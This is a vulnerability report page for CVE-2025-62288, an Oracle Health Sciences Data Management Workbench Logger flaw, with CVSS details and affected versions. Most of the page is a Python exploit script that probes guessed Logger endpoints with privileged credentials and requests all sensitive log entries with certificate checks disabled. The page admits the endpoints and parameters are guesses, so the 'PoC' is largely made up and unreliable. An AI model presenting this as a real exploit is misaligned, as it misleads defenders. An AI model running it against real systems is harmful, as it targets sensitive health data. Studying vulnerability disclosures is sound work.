Security Vulnerability Report
CVE-2025-62288 CVSS 4.9 MEDIUM

CVE-2025-62288

Published: 2025-10-21 20:20:54
Last Modified: 2025-10-24 13:19:51

Description

Vulnerability in the Oracle Health Sciences Data Management Workbench product of Oracle Health Sciences Applications (component: Logger). Supported versions that are affected are 3.4.0.1.3 and 3.4.1.0.10. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Health Sciences Data Management Workbench. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Health Sciences Data Management Workbench accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:health_sciences_data_management_workbench:3.4.0.1.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:health_sciences_data_management_workbench:3.4.1.0.10:*:*:*:*:*:*:* - VULNERABLE
Oracle Health Sciences Data Management Workbench 3.4.0.1.3
Oracle Health Sciences Data Management Workbench 3.4.1.0.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The endpoint paths and query parameters it probes do not come from the vendor advisory, which publishes no technical details for this CVE, so treat them as unverified guesses rather than confirmed behaviour of the Logger component.
```python
# CVE-2025-62288 - Oracle Health Sciences Data Management Workbench Logger Component PoC
# Vulnerability: Unauthorized Data Access via Logger Component
# CVSS: 4.9 (Medium) - AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

import requests
from requests.auth import HTTPBasicAuth

TARGET_URL = "https://target-oracle-health-sciences.example.com"
# Requires high-privileged credentials (PR:H)
USERNAME = "high_priv_user"
PASSWORD = "password123"


class OracleLoggerExploit:
    """
    PoC for CVE-2025-62288
    Exploits unauthorized data access in Oracle Health Sciences
    Data Management Workbench Logger component.
    """

    def __init__(self, base_url, username, password):
        self.base_url = base_url
        self.session = requests.Session()
        self.session.auth = HTTPBasicAuth(username, password)
        self.session.headers.update({
            "User-Agent": "Mozilla/5.0 (compatible; OracleHealthClient)",
            "Accept": "application/json, text/plain, */*"
        })

    def check_vulnerability(self):
        """Check if the target is vulnerable by probing the Logger endpoint."""
        logger_endpoints = [
            "/healthsci/dmw/logger/api/logs",
            "/healthsci/dmw/logger/api/audit",
            "/healthsci/dmw/logger/api/events",
            "/healthsci/dmw/api/logger/logs",
            "/dmw/logger/logs"
        ]
        for endpoint in logger_endpoints:
            url = f"{self.base_url}{endpoint}"
            try:
                resp = self.session.get(url, timeout=10, verify=False)
                if resp.status_code == 200:
                    print(f"[+] Logger endpoint accessible: {endpoint}")
                    return endpoint, resp
            except requests.exceptions.RequestException:
                continue
        return None, None

    def exploit_logger_access(self, endpoint):
        """
        Attempt to access unauthorized log data via the Logger component.
        The vulnerability allows high-privileged users to access data
        beyond their intended permission scope.
        """
        url = f"{self.base_url}{endpoint}"
        params = {
            "level": "ALL",
            "category": "ALL",
            "includeSensitive": "true",
            "maxResults": 1000
        }
        try:
            resp = self.session.get(url, params=params, timeout=30, verify=False)
            if resp.status_code == 200:
                data = resp.json()
                print(f"[+] Retrieved {len(data.get('logs', []))} log entries")
                print("[!] Sensitive data may be exposed in log entries")
                return data
        except Exception as e:
            print(f"[-] Exploitation failed: {e}")
        return None

    def run(self):
        print(f"[*] Targeting: {self.base_url}")
        print("[*] CVE-2025-62288 - Oracle Health Sciences DMW Logger Exploit")
        endpoint, response = self.check_vulnerability()
        if endpoint:
            print(f"[+] Target appears vulnerable. Logger endpoint: {endpoint}")
            data = self.exploit_logger_access(endpoint)
            if data:
                print("[!] Unauthorized data access confirmed!")
        else:
            print("[-] Target does not appear to be vulnerable or is not accessible.")


if __name__ == "__main__":
    exploit = OracleLoggerExploit(TARGET_URL, USERNAME, PASSWORD)
    exploit.run()
```

Weakness

CWE-267

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory)